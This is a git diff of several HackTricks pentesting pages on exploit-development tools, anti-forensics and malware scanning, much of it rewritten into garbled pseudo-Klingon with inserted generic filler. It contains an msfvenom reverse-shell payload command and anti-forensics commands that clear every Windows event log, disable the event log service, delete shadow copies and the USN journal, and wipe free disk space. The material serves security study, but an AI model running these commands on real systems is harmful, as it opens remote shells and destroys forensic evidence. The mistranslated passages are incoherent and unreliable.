<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>qaStaHvIS AWS hacking vItlhutlh</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
|
||||
|
@ -247,5 +238,3 @@ Other ways to support HackTricks:
|
|||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
File diff suppressed because one or more lines are too long
|
@ -1,22 +1,19 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>qaStaHvIS AWS hacking vItlhlaHbe'chugh</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
HackTricks Daq vItlhutlh:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* **HackTricks** vItlhutlh **company advertise** 'ej **HackTricks PDF download** 'oH [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) **chek**!
|
||||
* [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) vItlhutlh
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) vItlhutlh, **exclusive NFTs** [**NFTs**](https://opensea.io/collection/the-peass-family) vItlhutlh
|
||||
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) **join** 'ej [**telegram group**](https://t.me/peass) **join** 'ej **follow** **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Hacking tricks** **share** 'e' **submit PRs** [**HackTricks**](https://github.com/carlospolop/hacktricks) 'ej [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
# Metasploit
|
||||
|
||||
```
|
||||
pattern_create.rb -l 3000 #Length
|
||||
pattern_offset.rb -l 3000 -q 5f97d534 #Search offset
|
||||
|
@ -24,59 +21,92 @@ nasm_shell.rb
|
|||
nasm> jmp esp #Get opcodes
|
||||
msfelfscan -j esi /opt/fusion/bin/level01
|
||||
```
|
||||
|
||||
## Shellcodes
|
||||
|
||||
### What is a Shellcode?
|
||||
|
||||
A shellcode is a small piece of code that is used as the payload in an exploit. It is typically written in assembly language and is designed to be injected into a vulnerable program to gain unauthorized access or execute arbitrary commands.
|
||||
|
||||
### Creating Shellcodes
|
||||
|
||||
There are several tools and techniques available for creating shellcodes. Some popular ones include:
|
||||
|
||||
- **Metasploit Framework**: Metasploit is a powerful framework that provides a wide range of tools for creating and exploiting vulnerabilities. It includes a module called `msfvenom` that can be used to generate shellcodes in various formats.
|
||||
|
||||
- **Shellcode Compiler**: Shellcode Compiler is a tool that allows you to write shellcodes in high-level programming languages such as C and C++. It then compiles the code into assembly language, making it easier to create complex shellcodes.
|
||||
|
||||
- **Custom Shellcode Development**: If you have advanced knowledge of assembly language, you can write your own shellcodes from scratch. This gives you complete control over the functionality and size of the shellcode.
|
||||
|
||||
### Shellcode Execution
|
||||
|
||||
Once you have created a shellcode, you need a way to execute it on the target system. There are several techniques that can be used for this purpose:
|
||||
|
||||
- **Buffer Overflow**: Buffer overflow is a common vulnerability that can be exploited to execute shellcodes. By overflowing a buffer in a vulnerable program, you can overwrite the return address on the stack and redirect the program's execution flow to your shellcode.
|
||||
|
||||
- **Return-Oriented Programming (ROP)**: ROP is a technique that allows you to chain together small pieces of code, called gadgets, to create a larger payload. By carefully selecting gadgets from the target program's code, you can construct a ROP chain that eventually leads to the execution of your shellcode.
|
||||
|
||||
- **Heap Spraying**: Heap spraying is a technique that involves allocating a large number of objects in the heap and filling them with shellcode. By carefully controlling the layout of the heap, you can increase the chances of the shellcode being executed.
|
||||
|
||||
### Shellcode Analysis
|
||||
|
||||
Analyzing shellcodes is an important part of the exploit development process. It allows you to understand how the shellcode works and identify any potential weaknesses or anti-analysis techniques. Some popular tools for shellcode analysis include:
|
||||
|
||||
- **IDA Pro**: IDA Pro is a powerful disassembler and debugger that can be used to analyze shellcodes. It provides a graphical interface for navigating and analyzing the assembly code, making it easier to understand the shellcode's functionality.
|
||||
|
||||
- **GDB**: GDB is a command-line debugger that can be used to analyze shellcodes. It allows you to set breakpoints, step through the code, and inspect the values of registers and memory locations.
|
||||
|
||||
- **Online Sandboxes**: Online sandboxes, such as [Cuckoo Sandbox](https://cuckoosandbox.org/) and [Hybrid Analysis](https://www.hybrid-analysis.com/), can be used to execute shellcodes in a controlled environment and monitor their behavior. This can help identify any malicious or suspicious activities.
|
||||
|
||||
### Conclusion
|
||||
|
||||
Shellcodes are an essential component of exploit development. By understanding how to create, execute, and analyze shellcodes, you can enhance your hacking skills and effectively exploit vulnerabilities.
|
||||
```
|
||||
msfvenom /p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> [EXITFUNC=thread] [-e x86/shikata_ga_nai] -b "\x00\x0a\x0d" -f c
|
||||
```
|
||||
|
||||
# GDB
|
||||
|
||||
## Install
|
||||
|
||||
## qay'be'
|
||||
```
|
||||
apt-get install gdb
|
||||
```
|
||||
|
||||
## Parameters
|
||||
|
||||
**-q** --> No show banner\
|
||||
**-x \<file>** --> Auto-execute GDB instructions from here\
|
||||
**-p \<pid>** --> Attach to process
|
||||
**-q** --> Qap banner jImej\
|
||||
**-x \<file>** --> GDB instructions jatlh\
|
||||
**-p \<pid>** --> process jIloS
|
||||
|
||||
### Instructions
|
||||
|
||||
\> **disassemble main** --> Disassemble the function\
|
||||
\> **disassemble main** --> function jatlh\
|
||||
\> **disassemble 0x12345678**\
|
||||
\> **set disassembly-flavor intel**\
|
||||
\> **set follow-fork-mode child/parent** --> Follow created process\
|
||||
\> **p system** --> Find the address of the system function\
|
||||
\> **set follow-fork-mode child/parent** --> process jImej\
|
||||
\> **p system** --> system function jIqIm\
|
||||
\> **help**\
|
||||
\> **quit**
|
||||
|
||||
\> **br func** --> Add breakpoint to function\
|
||||
\> **br func** --> function qutlh\
|
||||
\> **br \*func+23**\
|
||||
\> **br \*0x12345678**\
|
||||
**> del NUM** --> Delete that number of br\
|
||||
\> **watch EXPRESSION** --> Break if the value changes
|
||||
**> del NUM** --> NUM qutlh\
|
||||
\> **watch EXPRESSION** --> value qImHa'
|
||||
|
||||
**> run** --> Execute\
|
||||
**> start** --> Start and break in main\
|
||||
\> **n/next** --> Execute next instruction (no inside)\
|
||||
\> **s/step** --> Execute next instruction\
|
||||
\> **c/continue** --> Continue until next breakpoint
|
||||
**> run** --> jImej\
|
||||
**> start** --> jImej je main\
|
||||
\> **n/next** --> next instruction jImej (ghorgh)\
|
||||
\> **s/step** --> next instruction jImej\
|
||||
\> **c/continue** --> next breakpoint jImej
|
||||
|
||||
\> **set $eip = 0x12345678** --> Change value of $eip\
|
||||
\> **info functions** --> Info abount functions\
|
||||
\> **info functions func** --> Info of the funtion\
|
||||
\> **info registers** --> Value of the registers\
|
||||
\> **set $eip = 0x12345678** --> $eip qImHa'\
|
||||
\> **info functions** --> function jImej\
|
||||
\> **info functions func** --> function jImej\
|
||||
\> **info registers** --> registers qImHa'\
|
||||
\> **bt** --> Stack\
|
||||
\> **bt full** --> Detailed stack
|
||||
\> **bt full** --> Detailed Stack
|
||||
|
||||
\> **print variable**\
|
||||
\> **print 0x87654321 - 0x12345678** --> Caculate\
|
||||
\> **examine o/x/u/t/i/s dir\_mem/reg/puntero** --> Shows content in octal/hexa/10/bin/instruction/ascii
|
||||
\> **examine o/x/u/t/i/s dir\_mem/reg/puntero** --> content jImej octal/hexa/10/bin/instruction/ascii
|
||||
|
||||
* **x/o 0xDir\_hex**
|
||||
* **x/2x $eip** --> 2Words from EIP
|
||||
|
@ -89,7 +119,6 @@ apt-get install gdb
|
|||
* **x/i $eip** —> Instructions of the EIP
|
||||
|
||||
## [GEF](https://github.com/hugsy/gef)
|
||||
|
||||
```bash
|
||||
checksec #Check protections
|
||||
p system #Find system function address
|
||||
|
@ -109,34 +138,32 @@ pattern search $rsp #Search the offset given the content of $rsp
|
|||
1- Put a bp after the function that overwrites the RIP and send a ppatern to ovwerwrite it
|
||||
2- ef➤ i f
|
||||
Stack level 0, frame at 0x7fffffffddd0:
|
||||
rip = 0x400cd3; saved rip = 0x6261617762616176
|
||||
called by frame at 0x7fffffffddd8
|
||||
Arglist at 0x7fffffffdcf8, args:
|
||||
Locals at 0x7fffffffdcf8, Previous frame's sp is 0x7fffffffddd0
|
||||
Saved registers:
|
||||
rbp at 0x7fffffffddc0, rip at 0x7fffffffddc8
|
||||
rip = 0x400cd3; saved rip = 0x6261617762616176
|
||||
called by frame at 0x7fffffffddd8
|
||||
Arglist at 0x7fffffffdcf8, args:
|
||||
Locals at 0x7fffffffdcf8, Previous frame's sp is 0x7fffffffddd0
|
||||
Saved registers:
|
||||
rbp at 0x7fffffffddc0, rip at 0x7fffffffddc8
|
||||
gef➤ pattern search 0x6261617762616176
|
||||
[+] Searching for '0x6261617762616176'
|
||||
[+] Found at offset 184 (little-endian search) likely
|
||||
```
|
||||
## pIq
|
||||
|
||||
## Tricks
|
||||
### GDB cha' addresses
|
||||
|
||||
### GDB same addresses
|
||||
|
||||
While debugging GDB will have **slightly different addresses than the used by the binary when executed.** You can make GDB have the same addresses by doing:
|
||||
GDB debugging DaH jatlh **binary executed when addresses vItlhutlh.** GDB addresses cha' vItlhutlh vaj:
|
||||
|
||||
* `unset env LINES`
|
||||
* `unset env COLUMNS`
|
||||
* `set env _=<path>` _Put the absolute path to the binary_
|
||||
* Exploit the binary using the same absolute route
|
||||
* `PWD` and `OLDPWD` must be the same when using GDB and when exploiting the binary
|
||||
* `set env _=<path>` _binary absolute path Put_
|
||||
* binary cha' absolute route vIghoS
|
||||
* `PWD` 'ej `OLDPWD` GDB 'ej binary cha' vIghoS
|
||||
|
||||
### Backtrace to find functions called
|
||||
|
||||
When you have a **statically linked binary** all the functions will belong to the binary (and no to external libraries). In this case it will be difficult to **identify the flow that the binary follows to for example ask for user input**.\
|
||||
You can easily identify this flow by **running** the binary with **gdb** until you are asked for input. Then, stop it with **CTRL+C** and use the **`bt`** (**backtrace**) command to see the functions called:
|
||||
|
||||
DaH **statically linked binary** DaH jatlh functions binary (external libraries). vaj, **identify the flow binary follows to for example ask for user input** vItlhutlh.\
|
||||
binary **running** ghaH **gdb** until input vItlhutlh. vaj, **CTRL+C** 'ej **`bt`** (**backtrace**) command vIghoS functions called:
|
||||
```
|
||||
gef➤ bt
|
||||
#0 0x00000000004498ae in ?? ()
|
||||
|
@ -145,7 +172,6 @@ gef➤ bt
|
|||
#3 0x00000000004011a9 in ?? ()
|
||||
#4 0x0000000000400a5a in ?? ()
|
||||
```
|
||||
|
||||
## GDB server
|
||||
|
||||
`gdbserver --multi 0.0.0.0:23947` (in IDA you have to fill the absolute path of the executable in the Linux machine and in the Windows machine)
|
||||
|
@ -201,23 +227,21 @@ _Remember that the first 0x08 from where the RIP is saved belongs to the RBP._
|
|||
**rabin2 -i ejecutable -->** Address of all the functions
|
||||
|
||||
# **Inmunity debugger**
|
||||
|
||||
```bash
|
||||
!mona modules #Get protections, look for all false except last one (Dll of SO)
|
||||
!mona find -s "\xff\xe4" -m name_unsecure.dll #Search for opcodes insie dll space (JMP ESP)
|
||||
```
|
||||
|
||||
# IDA
|
||||
|
||||
## Debugging in remote linux
|
||||
|
||||
Inside the IDA folder you can find binaries that can be used to debug a binary inside a linux. To do so move the binary _linux\_server_ or _linux\_server64_ inside the linux server and run it nside the folder that contains the binary:
|
||||
**tlhIngan Hol:**
|
||||
|
||||
IDA qachDaq, linuxDaq binary debugging laH binaries vItlhutlh. vaj binary _linux\_server_ yIlo' _linux\_server64_ linux server vItlhutlh 'ej run vItlhutlh binary DaH jImejDaq:
|
||||
```
|
||||
./linux_server64 -Ppass
|
||||
```
|
||||
|
||||
Then, configure the debugger: Debugger (linux remote) --> Proccess options...:
|
||||
Qong, configure the debugger: Debugger (linux remote) --> Proccess options...:
|
||||
|
||||
![](<../../.gitbook/assets/image (101).png>)
|
||||
|
||||
|
@ -235,5 +259,3 @@ Other ways to support HackTricks:
|
|||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
File diff suppressed because it is too large
Load diff
File diff suppressed because one or more lines are too long
|
@ -2,7 +2,7 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>!HackTricks</strong></a><strong>!</strong></summary>
|
||||
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
|
@ -91,7 +91,7 @@ Keep in mind the possible use of anti-forensic techniques:
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>!HackTricks</strong></a><strong>!</strong></summary>
|
||||
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
|
|
|
@ -1,8 +1,6 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>!HackTricks</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
|
||||
|
@ -119,49 +117,48 @@ Whenever a folder is opened from an NTFS volume on a Windows NT server, the syst
|
|||
2. Browse to `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem`.
|
||||
3. Look for `NtfsDisableLastAccessUpdate`. If it doesn’t exist, add this DWORD and set its value to 1, which will disable the process.
|
||||
4. Close the Registry Editor, and reboot the server.
|
||||
|
||||
## Delete USB History
|
||||
|
||||
All the **USB Device Entries** are stored in Windows Registry Under the **USBSTOR** registry key that contains sub keys which are created whenever you plug a USB Device into your PC or Laptop. You can find this key here H`KEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR`. **Deleting this** you will delete the USB history.\
|
||||
You may also use the tool [**USBDeview**](https://www.nirsoft.net/utils/usb\_devices\_view.html) to be sure you have deleted them (and to delete them).
|
||||
**USB Device Entries** are stored in the Windows Registry under the **USBSTOR** registry key. This key contains subkeys that are created when a USB Device is plugged into a PC or Laptop. The key can be found at H`KEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR`. Deleting this key will delete the USB history.\
|
||||
You can also use the tool [**USBDeview**](https://www.nirsoft.net/utils/usb\_devices\_view.html) to ensure that the entries are deleted (and to delete them).
|
||||
|
||||
Another file that saves information about the USBs is the file `setupapi.dev.log` inside `C:\Windows\INF`. This should also be deleted.
|
||||
Another file that saves information about USBs is the file `setupapi.dev.log` located in `C:\Windows\INF`. This file should also be deleted.
|
||||
|
||||
## Disable Shadow Copies
|
||||
|
||||
**List** shadow copies with `vssadmin list shadowstorage`\
|
||||
**Delete** them running `vssadmin delete shadow`
|
||||
To **list** shadow copies, use `vssadmin list shadowstorage`.\
|
||||
To **delete** them, run `vssadmin delete shadow`.
|
||||
|
||||
You can also delete them via GUI following the steps proposed in [https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html](https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html)
|
||||
You can also delete them using the GUI by following the steps provided in [https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html](https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html).
|
||||
|
||||
To disable shadow copies [steps from here](https://support.waters.com/KB_Inf/Other/WKB15560_How_to_disable_Volume_Shadow_Copy_Service_VSS_in_Windows):
|
||||
To disable shadow copies, follow the steps outlined in [this link](https://support.waters.com/KB_Inf/Other/WKB15560_How_to_disable_Volume_Shadow_Copy_Service_VSS_in_Windows):
|
||||
|
||||
1. Open the Services program by typing "services" into the text search box after clicking the Windows start button.
|
||||
2. From the list, find "Volume Shadow Copy", select it, and then access Properties by right-clicking.
|
||||
3. Choose Disabled from the "Startup type" drop-down menu, and then confirm the change by clicking Apply and OK.
|
||||
2. Find "Volume Shadow Copy" from the list, select it, and access Properties by right-clicking.
|
||||
3. Choose "Disabled" from the "Startup type" drop-down menu, and confirm the change by clicking Apply and OK.
|
||||
|
||||
It's also possible to modify the configuration of which files are going to be copied in the shadow copy in the registry `HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToSnapshot`
|
||||
It is also possible to modify the configuration of which files are copied in the shadow copy by editing the registry key `HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToSnapshot`.
|
||||
|
||||
## Overwrite deleted files
|
||||
|
||||
* You can use a **Windows tool**: `cipher /w:C` This will indicate cipher to remove any data from the available unused disk space inside the C drive.
|
||||
* You can also use tools like [**Eraser**](https://eraser.heidi.ie)
|
||||
* You can use a **Windows tool**: `cipher /w:C`. This command instructs cipher to remove any data from the available unused disk space on the C drive.
|
||||
* You can also use tools like [**Eraser**](https://eraser.heidi.ie).
|
||||
|
||||
## Delete Windows event logs
|
||||
|
||||
* Windows + R --> eventvwr.msc --> Expand "Windows Logs" --> Right click each category and select "Clear Log"
|
||||
* `for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"`
|
||||
* `Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }`
|
||||
* Windows + R --> eventvwr.msc --> Expand "Windows Logs" --> Right-click each category and select "Clear Log".
|
||||
* `for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"`.
|
||||
* `Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }`.
|
||||
|
||||
## Disable Windows event logs
|
||||
|
||||
* `reg add 'HKLM\SYSTEM\CurrentControlSet\Services\eventlog' /v Start /t REG_DWORD /d 4 /f`
|
||||
* Inside the services section disable the service "Windows Event Log"
|
||||
* `WEvtUtil.exec clear-log` or `WEvtUtil.exe cl`
|
||||
* `reg add 'HKLM\SYSTEM\CurrentControlSet\Services\eventlog' /v Start /t REG_DWORD /d 4 /f`.
|
||||
* Disable the "Windows Event Log" service in the services section.
|
||||
* `WEvtUtil.exec clear-log` or `WEvtUtil.exe cl`.
|
||||
|
||||
## Disable $UsnJrnl
|
||||
|
||||
* `fsutil usn deletejournal /d c:`
|
||||
* `fsutil usn deletejournal /d c:`.
|
||||
|
||||
|
||||
<details>
|
||||
|
@ -177,5 +174,3 @@ Other ways to support HackTricks:
|
|||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
File diff suppressed because one or more lines are too long
|
@ -1,5 +1,3 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
@ -20,7 +18,7 @@ Other ways to support HackTricks:
|
|||
A baseline consists of taking a snapshot of certain parts of a system to **compare it with a future status to highlight changes**.
|
||||
|
||||
For example, you can calculate and store the hash of each file of the filesystem to be able to find out which files were modified.\
|
||||
This can also be done with the user accounts created, processes running, services running and any other thing that shouldn't change much, or at all.
|
||||
This can also be done with the user accounts created, processes running, services running and any other thing that shouldn't change much, or at all.
|
||||
|
||||
## File Integrity Monitoring
|
||||
|
||||
|
@ -52,5 +50,3 @@ Other ways to support HackTricks:
|
|||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
File diff suppressed because one or more lines are too long
|
@ -31,59 +31,86 @@ Other ways to support HackTricks:
|
|||
### Yara
|
||||
|
||||
#### Install
|
||||
|
||||
```bash
|
||||
sudo apt-get install -y yara
|
||||
```
|
||||
|
||||
#### Prepare rules
|
||||
|
||||
Use this script to download and merge all the yara malware rules from github: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\
|
||||
Create the _**rules**_ directory and execute it. This will create a file called _**malware\_rules.yar**_ which contains all the yara rules for malware.
|
||||
|
||||
#### Prepare rules
|
||||
|
||||
Use this script to download and merge all the yara malware rules from github: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\
|
||||
Create the _**rules**_ directory and execute it. This will create a file called _**malware\_rules.yar**_ which contains all the yara rules for malware.
|
||||
```bash
|
||||
wget https://gist.githubusercontent.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9/raw/4ec711d37f1b428b63bed1f786b26a0654aa2f31/malware_yara_rules.py
|
||||
mkdir rules
|
||||
python malware_yara_rules.py
|
||||
```
|
||||
#### Qap
|
||||
|
||||
#### Scan
|
||||
##### Noun
|
||||
###### Definition:
|
||||
A process of searching for malware or suspicious files on a system or network.
|
||||
|
||||
##### Verb
|
||||
###### Definition:
|
||||
To search for malware or suspicious files on a system or network.
|
||||
|
||||
##### Example:
|
||||
- **Noun**: The scan revealed several malicious files on the compromised system.
|
||||
- **Verb**: The security analyst scanned the network for any signs of intrusion.
|
||||
```bash
|
||||
yara -w malware_rules.yar image #Scan 1 file
|
||||
yara -w malware_rules.yar folder #Scan the whole folder
|
||||
```
|
||||
#### YaraGen: malware vItlhutlh je Create rules
|
||||
|
||||
#### YaraGen: Check for malware and Create rules
|
||||
|
||||
You can use the tool [**YaraGen**](https://github.com/Neo23x0/yarGen) to generate yara rules from a binary. Check out these tutorials: [**Part 1**](https://www.nextron-systems.com/2015/02/16/write-simple-sound-yara-rules/), [**Part 2**](https://www.nextron-systems.com/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/), [**Part 3**](https://www.nextron-systems.com/2016/04/15/how-to-write-simple-but-sound-yara-rules-part-3/)
|
||||
|
||||
[**YaraGen**](https://github.com/Neo23x0/yarGen) tool vItlhutlh yara rules binary. tutorial vItlhutlh: [**Part 1**](https://www.nextron-systems.com/2015/02/16/write-simple-sound-yara-rules/), [**Part 2**](https://www.nextron-systems.com/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/), [**Part 3**](https://www.nextron-systems.com/2016/04/15/how-to-write-simple-but-sound-yara-rules-part-3/)
|
||||
```bash
|
||||
python3 yarGen.py --update
|
||||
python3.exe yarGen.py --excludegood -m ../../mals/
|
||||
python3 yarGen.py --update
|
||||
python3.exe yarGen.py --excludegood -m ../../mals/
|
||||
```
|
||||
|
||||
### ClamAV
|
||||
|
||||
#### Install
|
||||
#### Qay'be'lu'
|
||||
|
||||
```
|
||||
$ sudo apt-get install clamav
|
||||
```
|
||||
|
||||
#### Qay'be'lu'
|
||||
```
|
||||
sudo apt-get install -y clamav
|
||||
```
|
||||
#### Qap
|
||||
|
||||
#### Scan
|
||||
`Scan` is the process of examining a system or file for the presence of malware. It involves analyzing the system or file to identify any suspicious or malicious behavior or artifacts. The purpose of scanning is to detect and identify malware so that appropriate actions can be taken to mitigate the threat.
|
||||
|
||||
There are various scanning techniques and tools available for malware analysis. These include:
|
||||
|
||||
- **Signature-based scanning**: This technique involves comparing the system or file against a database of known malware signatures. If a match is found, it indicates the presence of malware.
|
||||
|
||||
- **Heuristic scanning**: This technique involves using algorithms to identify potentially malicious behavior or patterns in the system or file. It can detect unknown or zero-day malware that may not have a known signature.
|
||||
|
||||
- **Behavioral scanning**: This technique involves monitoring the behavior of the system or file in a controlled environment to identify any suspicious or malicious activity. It can detect malware that may not exhibit any specific signature or behavior.
|
||||
|
||||
- **Static analysis**: This technique involves examining the code or structure of the file without executing it. It can identify potential vulnerabilities or malicious code snippets.
|
||||
|
||||
- **Dynamic analysis**: This technique involves executing the file in a controlled environment and monitoring its behavior. It can identify any malicious activity or behavior exhibited by the file.
|
||||
|
||||
Scanning is an essential step in malware analysis as it helps in identifying and understanding the nature of the malware. It provides valuable insights into the behavior, capabilities, and potential impact of the malware, which can aid in developing effective mitigation strategies.
|
||||
```bash
|
||||
sudo freshclam #Update rules
|
||||
clamscan filepath #Scan 1 file
|
||||
clamscan folderpath #Scan the whole folder
|
||||
```
|
||||
|
||||
### [Capa](https://github.com/mandiant/capa)
|
||||
|
||||
**Capa** detects potentially malicious **capabilities** in executables: PE, ELF, .NET. So it will find things such as Att\&ck tactics, or suspicious capabilities such as:
|
||||
**Capa** jatlhbe'chugh executables: PE, ELF, .NET, **capabilities** potlh potentially malicious **detects**. So it will find things such as Att\&ck tactics, or suspicious capabilities such as:
|
||||
|
||||
* check for OutputDebugString error
|
||||
* OutputDebugString error check
|
||||
* run as a service
|
||||
* create process
|
||||
|
||||
|
@ -101,61 +128,56 @@ You can use tools such as [**Redline**](https://www.fireeye.com/services/freewar
|
|||
|
||||
[**Loki**](https://github.com/Neo23x0/Loki) is a scanner for Simple Indicators of Compromise.\
|
||||
Detection is based on four detection methods:
|
||||
|
||||
```
|
||||
1. File Name IOC
|
||||
Regex match on full file path/name
|
||||
Regex match on full file path/name
|
||||
|
||||
2. Yara Rule Check
|
||||
Yara signature matches on file data and process memory
|
||||
Yara signature matches on file data and process memory
|
||||
|
||||
3. Hash Check
|
||||
Compares known malicious hashes (MD5, SHA1, SHA256) with scanned files
|
||||
|
||||
4. C2 Back Connect Check
|
||||
Compares process connection endpoints with C2 IOCs (new since version v.10)
|
||||
```
|
||||
Compares known malicious hashes (MD5, SHA1, SHA256) with scanned files
|
||||
|
||||
4. C2 Back Connect Check
|
||||
Compares process connection endpoints with C2 IOCs (new since version v.10)
|
||||
```
|
||||
### Linux Malware Detect
|
||||
|
||||
[**Linux Malware Detect (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) is a malware scanner for Linux released under the GNU GPLv2 license, that is designed around the threats faced in shared hosted environments. It uses threat data from network edge intrusion detection systems to extract malware that is actively being used in attacks and generates signatures for detection. In addition, threat data is also derived from user submissions with the LMD checkout feature and malware community resources.
|
||||
[**Linux Malware Detect (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) jatlh malware scanner'e' Linux'e' chel, GNU GPLv2 license'e' released'e', vaj shared hosted environments'e' faced threats'e' designed'e'. Qapla' network edge intrusion detection systems'e' threat data vItlhutlh malware actively being used'e' attacks'e' extract'e' vaj detection'e' signatures generate'e'. Furthermore, LMD checkout feature vaj malware community resources'e' user submissions vItlhutlh threat data derived'e'.
|
||||
|
||||
### rkhunter
|
||||
|
||||
Tools like [**rkhunter**](http://rkhunter.sourceforge.net) can be used to check the filesystem for possible **rootkits** and malware.
|
||||
|
||||
[**rkhunter**](http://rkhunter.sourceforge.net) vItlhutlh tools'e' filesystem possible rootkits malware check'e'.
|
||||
```bash
|
||||
sudo ./rkhunter --check -r / -l /tmp/rkhunter.log [--report-warnings-only] [--skip-keypress]
|
||||
```
|
